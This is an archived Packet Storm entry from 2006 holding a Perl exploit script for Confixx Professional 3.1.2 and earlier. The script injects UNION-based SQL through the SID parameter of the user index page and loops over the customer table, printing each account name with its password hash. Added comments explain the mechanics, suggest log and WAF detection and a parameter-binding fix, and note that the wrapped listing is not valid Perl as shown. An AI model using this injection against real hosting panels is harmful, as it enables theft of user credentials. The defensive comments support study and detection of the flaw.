confixx_exploit.pl.txt

2006-04-28T00:00:00
ID PACKETSTORM:45846
Type packetstorm
Reporter defa
Modified 2006-04-28T00:00:00

Description

                                        
sry - i know this isn't a cvs repository here -
  
but the code posted yesterday was written after some 'b33r' and i made
it looking  
a little less drunk this morning.  
  
bye  
defa  
  
----BOF----  
#!/usr/bin/perl  
  
########################################################################   
########  
#   
#  
# exploit for confixx professional <=   
3.1.2 #  
#   
#  
# the vulnerability was discovered by: LoK
Crew #  
# references: http://www.securityfocus.com/bid/   
17476 #  
#   
#  
# exploit can be used for any purpose but on own   
risk #  
#   
#  
# (c) by defa - sorry for the crappy   
code #  
#   
#  
# url is just the host - directory is $url/user/index.php by   
default #  
# the exploit just fetches the longpw hashes of all
users #  
#   
#  
# parts of the code are stolen from RuSH exploits - thanks a lot   
folks #  
########################################################################   
########  
  
use IO::Socket;  
  
# Flat script, no named subs and no strict/warnings. With no argument it
# prints the usage banner; otherwise it sends a series of GET requests to the
# given host and prints every response line tagged "<p>HIT:".
# NOTE: as reproduced here the listing is mail-wrapped (two of the string
# literals below are broken across lines), so it is not valid Perl as shown.
if (@ARGV < 1)  
{  
print q(  
exploit by defa (2006)  
=========================  
confixx_exploit.pl [URL]  
  
params:  
[URL] - server url  
  
example: confixx_exploit.pl 127.0.0.1  
);  
exit;  
}  
  
# Host from the command line; a leading "http://" is stripped. The /e flag on
# an empty replacement evaluates nothing and has no effect here.
$serv = $ARGV[0];  
$serv =~ s/(http:\/\/)//eg;  
  
# One request per row index 0..100. Each request carries a SID value that
# begins with "1'" and continues with AND / UNION SELECT keywords, asking the
# server (presumably interpolating SID unescaped into SQL -- not verifiable
# from this script) to return one row of the kunden table, labelled with the
# marker "HIT: <kunde> : <longpw> : " via CONCAT, limited to row $i.
# Defender's notes: the request line is straightforward to match in access
# logs or at a WAF (quote-then-UNION in a SID parameter), and the script also
# sends a constant User-Agent "confixx_exploit". Server-side, the fix is to
# validate SID as an integer and bind it as a query parameter.
for ($i=0;$i<=100;$i++)  
{  
$hit = 0;  
$url = "http://";  
$url .= $serv;  
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";  
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT:   
%20',";  
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'%   
20FROM%20";  
$url .= "kunden%20LIMIT%20";  
$url .= "$i,1/*";  
  
# Plain TCP to port 80 (no TLS); a failed connect aborts the whole run.
$socket = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $serv,  
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";  
  
  
# Hand-written HTTP/1.1 request; "Connection: close" so the read loop below
# ends when the server closes the socket.
print $socket "GET $url HTTP/1.1\n";  
print $socket "Host: $serv\n";  
print $socket 'User-Agent: confixx_exploit'."\n";  
print $socket "Connection: close\n\n";  
while ($answer = <$socket>)  
{  
if ($answer =~ /<p>HIT:/)  
{  
# The CONCAT marker is "HIT: <kunde> : <longpw> : ", so splitting on ": "
# leaves the account name in [1] and the longpw hash in [2].
@result = split(/: /,$answer);  
  
print "$result[1]: $result[2]\n";  
$hit = 1;  
}  
  
}  
# A pass that produced no HIT line is taken to mean the row index is past the
# last row, and the script stops there.
if ($hit == 0) {die("that's it");}  
}  
  
----EOF----  
--  
don't eat yellow snow  
  
  
  